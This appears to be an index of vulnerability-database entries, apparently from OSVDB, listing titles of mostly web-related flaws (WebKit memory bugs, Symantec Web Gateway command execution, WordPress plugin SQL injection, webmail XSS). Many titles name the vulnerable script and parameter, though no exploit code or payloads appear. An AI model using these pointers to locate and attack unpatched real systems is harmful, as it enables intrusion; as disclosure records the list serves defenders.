[85340] Juniper Junos lo0 Loopback Interface discard Filter Term Firewall Bypass
[85337] Juniper Junos J-Web Component index.php XSS
[85336] Juniper Junos J-Web Component Hash Collision Web Form Post Parsing Remote DoS
[85323] Siemens SIMATIC WinCC WebNavigator Component Unspecified XSS
[85320] Siemens SIMATIC WinCC WebNavigator Component SOAP Messages SQL Injection
[85318] Siemens SIMATIC WinCC WebNavigator Component Unspecified Traversal Arbitrary File Access
[85311] PacketFence web.pm web_node_register Function Remote Code Execution
[85308] Mobclix Ad Library for Android com.mobclix.android.sdk.MobclixJavascriptInterface Location Change Remote Disclosure
[85298] Cart32 c32web.exe Multiple Directive Path Disclosure
[85297] Cart32 c32web.exe ShowProgress Function CPU Consumption Remote DoS
[85261] Cybozu Live for Android WebView Class Application Handling Local File: URL Handling Arbitrary JavaScript Code Execution
[85258] HONEYWELL HMIWeb Browser HSCDSPRenderDLL ActiveX Overflow
[85248] Webmin show.cgi open() Function Call Remote Shell Command Execution
[85247] Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
[85246] Webmin edit_mon.cgi Monitor Type Name Remote Perl Code Execution
[85245] Webmin save_mon.cgi Monitor Type Name Remote Perl Code Execution
[85191] playSMS web/plugin/tools/sendfromfile.php Uploaded CSF File Handling SMS Message Spoofing
[85142] Roundcube Webmail Email Body / Signature XSS
[85101] Websense Email Security SMTP Component Default SSL Cipher Key Weakness
[85100] Websense Web Security TRITON Management Console Crafted Cookie Authentication Bypass
[85099] Websense Email Security Personal Email Manager Component JBoss Status Page Crafted Query Unspecified Information Disclosure
[85098] Websense Email Security SMTP 8BITMIME EHLO Keyword Sender-based Blacklist Bypass
[85097] Websense Email Security Rules Service Crafted Attachment Remote DoS
[85096] Websense Email Security Receive Service Blacklist Domain Extension Bypass Weakness
[85095] Websense V10000 Appliance File Buffering Overflow Remote DoS
[85094] Websense V10000 Appliance Invalid Login Intermittent LDAP Authentication Availability Remote DoS
[85093] Websense Web Security / Web Filter Filtering Service Malformed URI Parsing Remote DoS (2009-5132)
[85070] Asterisk Manager Interface ExternalIVR Application Originate Action Handling Remote Shell Command Execution
[85064] HD Webplayer Plugin for WordPress wp-content/plugins/webplayer/config.php id Parameter SQL Injection
[85063] HD Webplayer Plugin for WordPress wp-content/plugins/webplayer/playlist.php videoid Parameter SQL Injection
[85044] Websense Web Security / Web Filter Remote Filtering Component Traffic Saturation Remote DoS
[85043] Websense Web Security / Web Filter Filtering Service Malformed URI Parsing Remote DoS (2010-5145)
[85042] Websense Web Security / Web Filter Remote Filtering Component Local File Manipulation Filter Bypass
[85041] Websense Web Security / Web Filter HTTPS Session Cookie Secure Flag Weakness
[85040] Websense Web Security / Web Filter URL Handling Remote Overflow DoS
[85031] WebKit Input / Textarea Element display:run-in Handling Bad Cast Memory Corruption
[85030] WebKit RenderBlock::LineBreaker::nextLineBreak Line Break Handling Out-of-bounds Read Issue
[85027] Symantec Messaging Gateway Unspecified Web Application Modification
[85025] IBM WebSphere Application Server (WAS) Unspecified Admin Authentication Bypass
[85003] Mozilla Multiple Product Web Console eval() Remote Code Execution
[84993] Mozilla Multiple Product WebGL Shader Use-after-free Remote Code Execution
[84983] Websense Enterprise Filtering Service IP Address URL Categorization HTTP Request Parsing Filter Bypass
[84924] GREE Multiple Applications for Android WebView Class Implementation Application Handling Information Disclosure
[84918] IBM WebSphere Application Server (WAS) Global Security Kit (GSKit) TLS Handshake Protocol ClientHello Message Parsing Remote DoS
[84881] McAfee Host Data Loss Prevention (DLP) Web Post Protection Feature Local Information Disclosure
[84861] Websense Content Gateway monitor/m_overview.ink menu Parameter XSS
[84852] McAfee Email and Web Security / Email Gateway Unspecified XSS
[84851] McAfee Email and Web Security / Email Gateway Unspecified Admin Authentication Bypass
[84846] GWebmail gwebmail/?mail#Inbox.Search/ URI XSS
[84845] GWebmail Account Page Name Field XSS
[84844] GWebmail gwebmail/setup Multiple Field XSS
[84843] GWebmail webmail/ module Parameter Traversal Arbitrary File Access
[84842] GWebmail gwebmail/?mail# URI XSS
[84840] GWebmail Email Subject Field XSS
[84832] Squiz CMS /__web/Systems/UnregisteredDomainWidget Traversal Arbitrary File Access
[84817] OrderSys ordering/interface_creator/index_short.php Multiple Parameter XSS
[84816] OrderSys ordering/interface_creator/index_long.php Multiple Parameter XSS
[84812] OrderSys ordering/interface_creator/login.php Multiple Parameter XSS
[84807] Zingiri Web Shop Plugin for WordPress index.php Multiple Cookie Parameter SQL Injection
[84745] Dir2web system/src/dispatcher.php oid Parameter SQL Injection
[84744] Dir2web system/db/website.db Direct Request Remote Information Disclosure
[84741] Roundcube Webmail program/lib/washtml.php Email Body href HTML Attribute XSS
[84740] Roundcube Webmail program/steps/mail/func.inc Larry Skin Email Subject XSS
[84694] T-dah WebMail Email Message Body XSS
[84661] HP Service Manager and Service Center Web Tier Unspecified XSS
[84659] IBM WebSphere MQ Multiple Space Manipulation CSRF
[84658] IBM WebSphere MQ Access Restriction Bypass Unspecified Arbitrary File Access
[84648] ownCloud apps/files_sharing/sharedstorage.php fopen() Function WebDAV Request File Handle Returning Shared File Manipulation
[84634] Sun Java Web Server sunexamples.RealmDumpServlet Remote Information Disclosure
[84604] Microsoft Windows JScript / VBScript Memory Object Size Calculation Website Handling Memory Corruption
[84549] Cisco Adaptive Security Appliances (ASA) WebVPN Feature Memory Leak Remote DoS
[84543] wxBitcoin / bitcoind encrypt wallet Feature BSDDB Interface Bypass Private Key Disclosure
[84535] Viking Web Server Multiple Header Overflow
[84521] WinWebMail Server HTML Email Message XSS
[84506] Cisco IOS for Catalyst Switches Local Web Authentication Parsing Remote DoS
[84494] Inout Mobile Webmail Multiple Email Field XSS
[84484] Sleipnir Mobile Application for Android Website Handling Arbitrary Java Method Execution
[84469] Cisco AnyConnect Secure Mobility Client IPSec WebLaunch X.509 Certificate Validation MitM Spoofing Weakness
[84468] IBM WebSphere Application Server (WAS) Unspecified XSS
[84455] Symantec Web Gateway deptUploads_data.php groupid Parameter SQL Injection
[84444] Novell Remote Manager Small Http Interface Daemon (httpstkd) ProcessAuthorizationFailure() Function HTTP Header Parsing Remote DoS
[84406] Yahoo! Toolbar for Chrome / Safari Website Handling Search Keyword Information Disclosure
[84402] Ubisoft Uplay Plugin Website Handling Arbitrary Program Execution
[84397] Atmail Email Server WebAdmin Control Panel Direct Request Information Disclosure
[84392] Oxide WebServer Malformed HTTP GET Request Parsing Remote DoS
[84380] WebKit Calendar Picker Indicator Input Type Change Event Handling Memory Corruption
[84378] Google WebP Decoder CheckDecBuffer Function Integer Overflow
[84377] WebKit ProcessingInstruction::removedFrom Use-after-free Issue
[84374] Google Chrome WebUI Cookie Page Memory Address Disclosure Weakness
[84373] Google Chrome webRequest Chrome Web Store Request Interception XSS
[84369] WebKit GIFImageReader::read Function GIF Decoding Off-by-one Read Weakness
[84363] icedtea-web getFirstInTableInstance() Function Uninitialized Pointer Website Handling Remote Code Execution
[84362] icedtea-web Non-NUL termination String Malformed Java Applet Handling Memory Corruption
[84356] Dr.Web Enterprise Server Web-administrator Component Login Page username Field XSS
[84327] Sysax Multi Server Boundary Error HTTP Interface Logging Folder Creation Filename Request Parsing Remote Overflow
[84315] Sleipnir Mobile Application for Android WebView Class Implementation Application Handling Information Disclosure
[84310] Simple Web Server HTTP Header Parsing Remote Overflow
[84242] Transmission Web Client Inspector Imported Torrent File Multiple Field XSS
[84212] WebKit Website Handling Unspecified Memory Corruption (2012-0683)
[84211] WebKit Website Handling Unspecified Memory Corruption (2012-0682)
[84210] WebKit SVG Image Handling Memory Information Disclosure
[84209] WebKit File URL Handling Sandbox Bypass Arbitrary File Access Weakness
[84208] WebKit WebSockets Handling HTTP Header Response Splitting
[84207] WebKit Canonicalization URL Handling location.href Property XSS Weakness
[84206] WebKit Dragged File Handling Path Disclosure
[84205] WebKit International Domain Name (IDN) / Unicode Look-alike Character URL Bar Spoofing
[84204] WebKit CSS Property Value Handling Same Origin Policy Bypass Information Disclosure
[84202] WebKit Line Break Iterator Counter Content Handling Use-after-free Issue
[84201] WebKit Drag and Drop Handling Same Origin Policy Bypass Arbitrary File Access
[84200] WebKit Drag and Drop Handling Same Origin Policy Bypass Information Disclosure
[84199] WebKit 'RenderObject::markContainingBlocksForLayout' Function Use-after-free Issue
[84198] WebKit Website Handling Unspecified Memory Corruption (2012-3683)
[84197] WebKit Website Handling Unspecified Memory Corruption (2012-3682)
[84196] WebKit Accessibility Notifications Handling Use-after-free Issue
[84195] WebKit Text Splitting Event Handler Firing Use-after-free Issue
[84194] WebKit Website Handling Unspecified Memory Corruption (2012-3679)
[84193] WebKit Website Handling Unspecified Memory Corruption (2012-3678)
[84192] WebKit forceLayoutInlineChildren SVG <
[84191] WebKit Event Queue Closing Use-after-free Issue
[84190] WebKit Link Element Handling Use-after-free Issue
[84189] WebKit 'FrameLoader::urlSelected' Function Use-after-free Issue
[84188] WebKit Website Handling Unspecified Memory Corruption (2012-3667)
[84187] WebKit Website Handling Unspecified Memory Corruption (2012-3666)
[84186] WebKit Select Element Generated Contents Use-after-free Issue
[84185] WebKit Website Handling Unspecified Memory Corruption (2012-3664)
[84184] WebKit 'AccessibilityRenderObject::textUnderElement' Function Bad Cast Memory Corruption
[84183] WebKit SVG Font Handling Use-after-free Issue
[84182] WebKit 'RenderBlock::addChildIgnoringAnonymousColumnBlocks' Function Use-after-free Issue
[84181] WebKit 'RenderRubyBase::moveChildren' Function Use-after-free Issue
[84180] WebKit Removed Continuation In Multi-column Layout Access Use-after-free Issue
[84179] WebKit 'RenderTableSection::rowLogicalHeightChanged' Function Use-after-free Issue
[84178] WebKit Line Break Object Removal After Layout Use-after-free Issue
[84177] WebKit Website Handling Unspecified Memory Corruption (2012-3644)
[84176] WebKit Website Handling Unspecified Memory Corruption (2012-3642)
[84175] WebKit Run Layout Isolates Parsing Use-after-free Issue
[84174] WebKit 'RenderTable::computeLogicalWidth' Function Use-after-free Issue
[84173] WebKit first-letter Block Processing Use-after-free Issue
[84172] WebKit 'RenderBox::removeChild' Function Use-after-free Issue
[84171] WebKit 'RenderBlock::removeChild' Function Anonymous Block Handling Use-after-free Issue
[84170] WebKit Inline Positioned Element Handling Use-after-free Issue
[84169] WebKit Table Relative Positioned Object Reparenting Use-after-free Issue
[84168] WebKit Column Splitting / Appending Use-after-free Issue
[84167] WebKit Website Handling Unspecified Memory Corruption (2012-3631)
[84166] WebKit Website Handling Unspecified Memory Corruption (2012-3630)
[84165] WebKit 'HTMLFormControlElement::removedFrom' Function Use-after-free Issue
[84164] WebKit 'HTMLSelectElement::setOption' Function Use-after-free Issue
[84163] WebKit 'HTMLTreeBuilder::processEndTag' Function Memory Corruption
[84162] WebKit 'HTMLCollection::isAcceptableElement' Function Bad Cast Memory Corruption
[84161] WebKit 'CSSStyleRule::setSelectorText' Function Use-after-free Issue
[84160] WebKit ContainerNode Functions Mutation Events Handling Use-after-free Issue
[84159] WebKit Previous/Next Inline Box Search Handling Bad Cast Memory Corruption
[84158] WebKit Website Handling Unspecified Memory Corruption (2012-3615)
[84157] WebKit 'HTMLTreeBuilder::processIsindexStartTagForInBody' Function Bad Cast Memory Corruption
[84156] WebKit Container Node Functions Mutation Events Handling Use-after-free Issue
[84155] WebKit 'CompositeEditCommand::deleteInsignificantText' Function Use-after-free Issue
[84154] WebKit 'ContainerNode::appendChild' Function Use-after-free Issue
[84153] WebKit 'quoteCSSString' Function Overly Long String Quoting Integer Overflow Issue
[84152] WebKit 'RenderBlock::handleRunInChild' Function Memory Corruption
[84151] WebKit FormSubmission::create Form Submission Handling Bad Cast Memory Corruption
[84150] WebKit Website Handling Unspecified Memory Corruption (2012-3600)
[84149] WebKit 'AccessibilityRenderObject::childrenChanged' Function Use-after-free Issue
[84148] WebKit 'NavigationScheduler::schedule' Function Use-after-free Issue
[84147] WebKit 'Node::normalize' Function Use-after-free Issue
[84146] WebKit 'FrameLoader::checkTimerFired' Function Use-after-free Issue
[84145] WebKit Website Handling Unspecified Memory Corruption (2012-3594)
[84144] WebKit Clip Mask Rendering Use-after-free Issue
[84143] WebKit Website Handling Unspecified Memory Corruption (2012-3592)
[84142] WebKit Unspecified Memory Corruption (2012-3591)
[84141] WebKit Unspecified Memory Corruption (2012-3590)
[84140] WebKit Unspecified Memory Corruption (2012-3589)
[84139] WebKit Multi-column Button Layout Handling Use-after-free Issue
[84136] IBM WebSphere MQ Configuration Setup SVRCONN Channel User ID Verification Queue Manager Authentication Bypass
[84123] Symantec Web Gateway spywall/ldap_latest.php ip Parameter SQL Injection
[84122] Symantec Web Gateway Management Console Arbitrary Password Manipulation
[84121] Symantec Web Gateway Management Console Multiple Script Shell Command Execution
[84120] Symantec Web Gateway spywall/pbcontrol.php filename Parameter Remote Shell Command Execution
[84119] Symantec Web Gateway spywall/languageTest.php language Parameter Traversal Local File Inclusion
[84118] Symantec Web Gateway Management Console spywall/blocked.php id Parameter SQL Injection
[84103] Campaign Monitor Module for Drupal Admin Interface Unspecified XSS
[84095] Digital Unix sysadm Interface Account Creation Cleartext Local Password Disclosure
[84091] OSIsoft PI OPC DA Interface OPC Input Message Parsing Stack Buffer Overflow
[84081] Heartlab Encompass Web PACS SessionStart.asp Authentication Bypass
[84052] web@all my/kindeditor/index.php name Parameter XSS
[84043] Yahoo! Browser for Android WebView Class Unspecified Information Disclosure
[84036] Dr.Web Anti-virus for Android com.drweb.activities.antispam.CursorActivity Class SQL Query Handling Remote Information Disclosure
[83974] Oracle iPlanet Web Server Unspecified Remote DoS
[83924] Oracle Siebel CRM Web UI Subcomponent Unspecified Remote Issue
[83888] WebsiteBaker include/idna_convert/example.php lang Parameter XSS
[83856] International TeleCommunications WebBBS webbbs.exe Multiple Field Remote Overflow
[83826] WebPagetest getgzip.php file Parameter Traversal Arbitrary File Access
[83825] WebPagetest gettcpdump.php file Parameter Traversal Arbitrary File Access
[83824] WebPagetest work/workdone.php File Upload PHP Code Execution
[83823] WebPagetest work/dopublish.php File Upload PHP Code Execution
[83822] WebPagetest work/resultimage.php File Upload PHP Code Execution
[83821] WebPagetest delete.php testPath Traversal Arbitrary File Access
[83820] WebPagetest video/download.php id Traversal Arbitrary File Access
[83819] WebPagetest download.php testPath Traversal Arbitrary File Access
[83818] WebPagetest gettext.php file Parameter Traversal Arbitrary File Access
[83817] WebPagetest about.php cfg Cookie Parameter Traversal Local File Inclusion
[83744] Netsweeper webadmin/reporter/view_details.php sortitem Parameter SQL Injection
[83734] WebKit CounterNode::insertAfter Function Counter Handling Use-after-free Issue
[83728] Search Autocomplete Module for Drupal Admin Interface Access Restriction Bypass
[83727] WebKit Layout Height Tracking Use-after-free Issue
[83699] Netsweeper webadmin/tools/local_lookup.php group Parameter XSS
[83689] WebsitePanel Default.aspx ReturnURL Parameter Arbitrary Site Redirect
[83688] Webify Link Directory index.php id Parameter SQL Injection
[83683] Mono mcs/class/System.Web/System.Web/HttpForbiddenHandler.cs ProcessRequest() Function Query String XSS
[83631] Eclydre Web Manager administrator/action/upload.php File Upload PHP Code Execution
[83629] IBM WebSphere Portal Dojo Module URI Traversal Arbitrary File Access
[83579] ActiveCampaign 1-2-All Broadcast E-mail Public Admin Interface Unspecified XSS
[83545] Microsoft Outlook Web App owa/redir.aspx URL Parameter Arbitrary Site Redirect
[83538] Webmatic index.php HTTP Header Referer: Field SQL Injection
[83489] Zingiri Web Shop Plugin for WordPress wp-content/plugins/zingiri-web-shop/fws/download.php abspath Parameter Remote File Inclusion
[83476] Roundcube Webmail User Account Multiple Action CSRF
[83475] Roundcube Webmail index.php _user Parameter SQL Injection
[83451] Mac OS Personal Web / IP Sharing Malformed Request Handling Remote Overflow
[83444] WebTrends Enterprise Reporting Server POST Request Negative content-length Handling Remote DoS
[83414] webERP index.php PathPrefix Parameter Remote File Inclusion
[83413] SWFUpload swfupload.swf movieName Parameter ExternalInterface.call() Call XSS
[83402] Symantec Web Gateway spywall/adminConfig.php Remote Command Execution
[83400] webERP LanguageSetup.php PathPrefix Parameter Remote File Inclusion
[83396] SpecView Web Request Parsing Traversal Arbitrary File Access
[83386] Microsoft IIS Non-existent IDC File Request Web Root Path Disclosure
[83352] Cisco WebEx Recording Format Player WRF File Audio Size Handling Overflow
[83351] Cisco WebEx Recording Format Player WRF File Handling Memory Corruption
[83350] Cisco WebEx Recording Format Player WRF File JPEG DHT Chunk Handling Overflow
[83349] Cisco WebEx Recording Format Player WRF File Handling Overflow
[83287] Webify Multiple Products admin/index.php page Parameter Local File Inclusion
[83286] Webify Multiple Products index.php page Parameter Local File Inclusion
[83285] Webify Multiple Product /admin/index.php Multiple Admin Page XSS
[83284] web@all /search.php _text[title] Parameter XSS
[83283] web@all File Manipulation CSRF
[83281] Sysax Multi Server Admin Interface Multiple Page File Browsing Local Overflow
[83268] Horde IMP Webmail Client SVG Attachment XSS
[83265] Website FAQ Plugin for WordPress wp-admin/admin-ajax.php category Parameter SQL Injection
[83263] Symantec Message Filter Management Interface Access Permission Handling Version Information Disclosure
[83257] WebKit SVGDocumentExtensions::removeAllElementReferencesForTarget Function SVG Reference Handling Use-after-free Issue
[83256] WebKit RenderObject::setStyle Function First Letter Handling Use-after-free Issue
[83254] WebKit WebGL texSubImage2D Floating-point Texture Upload Handling Memory Corruption
[83252] WebKit iFrame Fragment ID Disclosure Frame Leak Attack Weakness
[83247] WebKit Texture Conversion Out-of-bounds Read Issue
[83246] WebKit RenderSVGContainer::paint Function SVG Painting Use-after-free Issue
[83245] WebKit GraphicsContext::restore Function SVG Resource Handling Use-after-free Issue
[83243] WebKit SVG Filter feConvolveMatrix Invalid Property Value Handling Out-of-bounds Read Issue
[83242] WebKit RenderObject::container Function Counter Layout Handling Use-after-free Issue
[83238] WebKit RenderTableSection::paintCell Function Table Section Handling Use-after-free Issue
[83210] Opera Malformed WebGL Content Handling DoS
[83193] SopCast WebPlayer sopocx.ocx ActiveX sop:// URL Handling Remote Overflow
[83181] JBoss Multiple Product Java Naming and Directory Interface (JNDI) Service Access Restriction Bypass
[83168] TinyWebGallery /admin/index.php user Parameter Remote PHP Code Execution
[83164] IBM Lotus Expeditor Web Container Access Control Header Request Parsing Header Spoofing
[83159] Cisco AnyConnect Secure Mobility Client VPN Downloader HostScan / WebLaunch Functionality Java / ActiveX Handling Downgrade Weakness
[83156] IBM WebSphere Application Server (WAS) Admin Console Integration Solution Console Unspecified XSS
[83155] IBM WebSphere Application Server (WAS) SSLv2 X.509 Client-certificate Authentication Bypass
[83153] Western Digital ShareSpace webgui config.xml Direct Request Admin Credential Disclosure
[83151] KENT-WEB WEB PATIO Unspecified Cookie XSS
[83150] KENT-WEB WEB PATIO Unspecified XSS
[83123] IBM WebSphere Application Server (WAS) Administration Console Unspecified XSS
[83110] JBoss Multiple Products WebPermissionMapping Permission Creation Access Restriction Bypass
[83096] Cisco AnyConnect Secure Mobility Client VPN Downloader WebLaunch Functionality Java / ActiveX Handling Remote Code Execution
[83080] Lokomedia CMS adminweb/media.php halaman Parameter XSS
[83065] EZserver Boundary Error Malformed Web Request Parsing Remote Overflow
[83043] West Wind Web Connect wc.dll Configuration Manipulation Remote Privilege Escalation
[83018] IBM WebSphere Application Server (WAS) iehs.war Unspecified XSS
[82962] TinyWebGallery /admin/index.php Multiple Parameter XSS
[82961] TinyWebGallery PHP Code Execution CSRF
[82956] Zingiri Web Shop Plugin for WordPress wp-content/plugins/zingiri-web-shop/fwkfor/ajax/uploadfilexd.php File Upload PHP Code Execution
[82942] Rocket U2 UniData unidata72 RPC Interface Call Parsing Arbitrary Command Execution
[82941] Quest Webthority Web SSO form-based Authentication Process CSRF
[82927] Symantec Web Gateway /spywall/download_file.php Arbitrary File Access
[82926] Symantec Web Gateway network.php exec() Call Remote File Inclusion
[82925] Symantec Web Gateway /spywall/ipchange.php exec() Call Remote File Inclusion
[82892] dailyinput Movie-Addon for webSPELL index.php portal Parameter SQL Injection
[82839] HP Web Jetadmin Unspecified XSS
[82820] Juniper Junos J-Web HTTP Connection Saturation CPU Utilization Remote DoS
[82788] Mbedthis AppWeb File Upload Handler Unspecified Boundary Condition Issues
[82787] Mbedthis AppWeb PHP Handler Malformed Form Variable Remote DoS
[82786] Mbedthis AppWeb ESP/EJS Token Handling Remote Corruption DoS
[82785] Mbedthis AppWeb Session Persistence Weakness
[82784] Mbedthis AppWeb MaRequest:getCrackedCookie Algorithm Cookie Parsing Memory Corruption
[82783] Mbedthis AppWeb Output Header Handling Remote Stack Overflow
[82759] Embedthis Appweb Unspecified Security Issue
[82750] Siemens SIMATIC WinCC Multiple Web Application Unspecified URL Parameter XPath System Setting Manipulation
[82743] IBM WebSphere Sensor Events HTTP Method Handling Unspecified Issue
[82742] IBM WebSphere Sensor Events Unspecified Directory Traversal
[82740] Siemens SIMATIC WinCC DiagAgent Web Server GET Request Handling Overflow DoS
[82733] Ada Web Server (AWS) Hash Function Predictable Collision Remote DoS
[82730] Mozilla Multiple Product NVIDIA Driver WebGL Implementation glBufferData Function Remote Code Execution
[82701] FIRSTBORN Movie-Addon for Webspell index.php id Parameter SQL Injection
[82691] IBM WebSphere Sensor Events searchView.jsp Unspecified XSS
[82690] IBM WebSphere Sensor Events deferredView.jsp Unspecified XSS
[82689] IBM WebSphere Sensor Events Unspecified XSS
[82688] Siemens SIMATIC WinCC Multiple Web Application Unspecified Traversal Arbitrary File Access
[82687] Siemens SIMATIC WinCC Multiple Web Application Unspecified XSS
[82684] Roundcube Webmail Embedded Image Attachment XSS
[82678] IpTools Mini Webserver (Thttpd.bat) Traversal Arbitrary File Access
[82628] @Web ShoppingCart Unspecified XSS
[82603] TinyWebGallery /inc/filefunctions.inc command Parameter Remote Command Execution
[82564] Microsoft Word WebView Crafted Metadata Handling Arbitrary Script Execution
[82563] Microsoft Visual Studio WebViewFolderIcon ActiveX (MSCOMM32.OCX) Overflow
[82514] Bloxx Web Filtering X-Forwarded-For HTTP Header Parsing IP Restriction Bypass
[82512] Bloxx Web Filtering Configuration Backup Admin Credential Disclosure
[82511] WebKit XSSAuditor Comment Tag Parsing XSS Protection Bypass Weakness
[82501] Bloxx Web Filtering Appliance Customization Menu Multiple Field XSS
[82500] Bloxx Web Filtering Alerts Menu Email: Destination Field XSS
[82499] Bloxx Web Filtering Proxy &
[82498] Bloxx Web Filtering Filtering Policies Menu Multiple Field XSS
[82497] Bloxx Web Filtering Users &
[82496] Bloxx Web Filtering Identification Menu Identify: Name Field XSS
[82495] Bloxx Web Filtering Administrators Menu Multiple Field XSS
[82481] TinyWebGallery info.php command Parameter Remote Command Execution
[82477] IBM WebSphere Application Server (WAS) Snoop Servlet Request Handling Information Disclosure
[82453] AutoFORM PDM Archive Web Service initializeQueryDatabase2 SOAP Request Parsing Database Information Disclosure
[82414] Simple Web Content Management System /admin/item_modify.php id Parameter SQL Injection
[82413] Simple Web Content Management System /admin/item_detail.php id Parameter SQL Injection
[82412] Simple Web Content Management System /admin/item_status.php Multiple Parameter SQL Injection
[82370] Horde Webmail Message Page XSS
[82369] Horde Webmail Minimal Mailbox Page XSS
[82368] Horde Webmail Dynamic Compose Page XSS
[82336] Savant Web Server Remote Overflow
[82242] WebKit RenderTableCell::layout Function First-letter Handling Use-after-free Issue
[82221] KENT-WEB Web Mart Cookie Handling XSS
[82219] KENT-WEB Web Mart CSS Support XSS
[82068] Moodle admin/webservice/service.php name Parameter XSS
[82035] iLunascape for Android WebView Class Unspecified Information Disclosure
[82027] Tornado tornado.web.RequestHandler.set_header() Function HTTP Response Splitting
[82025] Symantec Web Gateway spywall/blocked_file.php File Upload Remote Command Execution
[82024] Symantec Web Gateway spywall/previewProxyError.php err Parameter Traversal Arbitrary File Access
[82023] Symantec Web Gateway /spywall/releasenotes.php relfile Parameter Remote File Inclusion
[82022] Symantec Web Gateway Unspecified XSS
[82004] 3D Life Player WebPlayer ActiveX Multiple Boundary Error SRC Property String Parsing Remote Overflow
[81963] Google Chrome for Linux WebGL Implementation glBufferData Function Remote Code Execution
[81955] WebKit WebCore::GlyphPage::fill Function Glyph Handling Out-of-bounds Read Issue
[81952] WebKit Worker Thread Bridge Object Handling Race Condition Use-after-free Issue
[81951] WebKit WebCore::Element::recalcStyle Function Table Handling Use-after-free Issue
[81948] WebKit Style Element Handling Use-after-free Arbitrary Code Execution
[81946] Google Chrome Internal Page Link WebUI Renderer Process Opening Weakness
[81860] IBM WebSphere Application Server (WAS) WebServer Plugin Expired plugin-key.kdb Password HTTP Communication Encryption Weakness
[81853] Cisco IOS Interface Queue Wedge UDP Traffic Parsing Remote DoS
[81852] Cisco Wireless Control System (WCS) TAC Case Attachment webnms/Templ/ Arbitrary File Access
[81841] Cisco IOS Memory Leak NAT Interface SIP Packet Parsing Remote DoS
[81829] Kerio WinRoute Firewall Embedded Web Server Source Code Disclosure
[81819] Fortinet FortiWeb POST Request Parsing Web Application Firewall Policy Bypass
[81792] WebKit Unspecified Memory Corruption (2012-0672)
[81789] Schneider Electric Kerwin / Kerweb Searching / Displaying Content Unspecified XSS
[81788] Schneider Electric Kerwin / Kerweb kw.dll evtvariablename Parameter XSS
[81783] Cisco Unified MeetingPlace MP Web Unspecified XSS
[81771] BigACE Web CMS /public/index.php Multiple Parameter XSS
[81710] Symantec Web Gateway spywall/timer.php l Parameter XSS
[81665] Zingiri Web Shop Plugin for WordPress index.php Multiple Parameter XSS
[81647] WebKit RenderBlock::markSiblingsWithFloatsForLayout Intruding Float Handling Use-after-free Issue
[81644] WebKit XMLDocumentParser::exitText Function XML Parsing Use-after-free Issue
[81643] WebKit RenderBlock::clearFloats Intruding Float Handling Use-after-free Issue
[81627] IBM AppScan / Policy Tester Scan Job Creation Website Scanning Remote Code Execution
[81569] ACTi Web Configurator cgi-bin Traversal Arbitrary File Access
[81546] Oracle iPlanet Web Server admingui/cchelp2/Navigator.jsp Multiple Parameter XSS
[81545] Oracle iPlanet Web Server admingui/version/Masthead.jsp Multiple Parameter XSS
[81539] Website Design Cardiff viewdivetrip.php id Parameter SQL Injection
[81537] School Website Solutions (SWS) /calendar startdate Parameter XSS
[81536] School Website Solutions (SWS) /search search Parameter XSS
[81523] Mozilla Multiple Product WebGL texImage2D() Function JSVAL_TO_OBJECT Remote Code Execution
[81521] Mozilla Multiple Product IPv6 XMLHttpRequest / WebSocket Handling Same Origin Policy Bypass
[81519] Mozilla Multiple Product WebGL.drawElements() Function Template Argument Handling Video Memory Information Disclosure
[81493] Zingiri Web Shop Plugin for WordPress fws/pages-front/onecheckout.php notes Parameter XSS
[81492] Zingiri Web Shop Plugin for WordPress plugins/zingiri-web-shop/zing.inc.php page Parameter XSS
[81478] ZyXEL GS1510 webctrl.cgi MitM Credentials Disclosure
[81458] IBM Tivoli Directory Server Web Admin Tool Unspecified XSS
[81454] Asterisk Manager Interface Multiple Action Handling Remote Shell Command Execution
[81448] Zingiri Web Shop Plugin for WordPress Multiple Unspecified Remote Issues
[81447] TwitRocker2 for Android WebView Class Information Disclosure
[81443] IBM Rational ClearQuest RegisterSchemaRepoFromFileByDbSet() Function ActiveX (cqole.dll) Website Handling Remote Overflow
[81440] Oracle iPlanet Web Server admingui/cchelp2/Masthead.jsp Multiple Parameter XSS
[81425] Oracle Siebel Clinical Web UI Component Unspecified Remote Issue (2012-1674)
[81424] Oracle Siebel Clinical Web UI Component Unspecified Remote Issue (2012-0582)
[81372] Oracle Primavera P6 Enterprise Project Portfolio Management Web Application Component Unspecified Remote Issue
[81367] Oracle WebCenter Forms Recognition Sssplt30.dll ActiveX SaveLayout() Method Arbitrary File Overwrite
[81366] Oracle WebCenter Forms Recognition CroScPlt.dll ActiveX Save() Method Arbitrary File Overwrite
[81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
[81335] Cobbler Puppet Management Interface YAML String Loading Remote Code Execution
[81330] WebCalendar pref.php pref_THEME Parameter Local File Inclusion
[81329] WebCalendar install/index.php Access Restriction Weakness Remote Code Execution
[81300] Cox Web shop.php Multiple Parameter SQL Injection
[81292] Liferay Portal webdav Request Parsing Arbitrary File Access
[81291] Liferay Portal JSON Webservices Admin User Creation
[81280] Waylu CMS WebApps/products_xx.php id Parameter SQL Injection
[81279] Waylu CMS WebApps/products_xx.php id Parameter XSS
[81261] Website Toolbox cgi/members/mb_admins.cgi type Parameter XSS
[81260] Website Toolbox /register Multiple Parameter XSS
[81236] Oracle GlassFish Enterprise Server /web/grizzly/transports.jsf configName Parameter XSS
[81235] Oracle GlassFish Enterprise Server /web/grizzly/protocols.jsf configName Parameter XSS
[81234] Oracle GlassFish Enterprise Server /web/grizzly/networkListeners.jsf configName Parameter XSS
[81229] Oracle GlassFish Enterprise Server /web/grizzly/networkListeners.jsf configName Parameter XSS
[81193] Fastpath WebChat webapp/transcriptsrc.jsp Multiple Parameter XSS
[81192] Fastpath WebChat webapp/transcriptmain.jsp Multiple Parameter XSS
[81191] Fastpath WebChat webapp/style.jsp workgroup Parameter XSS
[81190] Fastpath WebChat webapp/queue_updater.jsp Multiple Parameter XSS
[81189] Fastpath WebChat webapp/email/offline-mail.jsp workgroup Parameter XSS
[81188] Fastpath WebChat webapp/email/leave-a-message.jsp workgroup Parameter XSS
[81187] Fastpath WebChat webapp/contact-agent.jsp email Parameter XSS
[81186] Fastpath WebChat webapp/chatroom.jsp Multiple Parameter XSS
[81185] Fastpath WebChat webapp/chatmain.jsp Multiple Parameter XSS
[81184] Fastpath WebChat webapp/chat-ended.jsp workgroup Parameter XSS
[81183] Fastpath WebChat webapp/agentinfo.jsp Multiple Parameter XSS
[81165] McAfee Web Gateway HTTP Header Host Field Parsing URL Filter Bypass
[81132] Microsoft Forefront Unified Access Gateway Default Website Configuration External Network Information Disclosure
[81111] SchoolCenter Web Tools education/components/calendar/default.php et Parameter XSS
